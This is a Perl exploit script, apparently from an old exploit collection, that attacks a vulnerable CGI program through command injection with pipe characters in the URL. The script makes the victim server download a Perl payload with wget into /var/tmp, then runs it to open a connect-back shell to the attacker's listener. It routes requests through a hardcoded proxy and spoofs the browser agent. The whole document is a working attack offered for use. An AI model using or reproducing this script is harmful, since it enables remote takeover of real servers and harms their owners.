#!/usr/bin/perl # use LWP::UserAgent; use HTTP::Message; if(!$ARGV[4]) { print "\n"; print "Exploits CGI-HOLE Coded By Ph03n1X\n"; print "Thx to y3dips\n"; print "Using connect-back method AresU 1stlink\n"; print "\n"; print "Usage = perl xplocgi.pl \n"; print "On your Box with public ip execute -#nc -l \n\n"; exit(0); } $serv=$ARGV[0]; $vuln=$ARGV[1]; $aku=$ARGV[2]; $portku=$ARGV[3]; $link=$ARGV[4]; $prox='http://222.124.24.23:3128'; $browse = LWP::UserAgent->new; $browse -> timeout(100); $browse -> agent("MSIE/6.0 Windows"); $browse -> proxy(http=>$prox) if defined($prox); $vulnurl = "http://$serv$vuln|wget $link -O /var/tmp/jancuk.pl|"; print "\n$vulnurl\nSEDANG DI PROSES\n\n"; $request = $browse->get($vulnurl); if(!($request->is_success)) { print($request->status_line."Gagal\n"); exit(0); } $conback = "http://$serv$vuln|perl /var/tmp/jancuk.pl $aku $portku|"; print "\nKoneksi balik sedang dilakukan\n$conback\n\n"; $request2 = $browse->get($conback); if(!($request2->is_success)) { print($request->status_line."Gagal\n"); exit(0); } print "See your box NOW\n"; print "IF you don't see the victim shell, it means exploitation failed\n\n";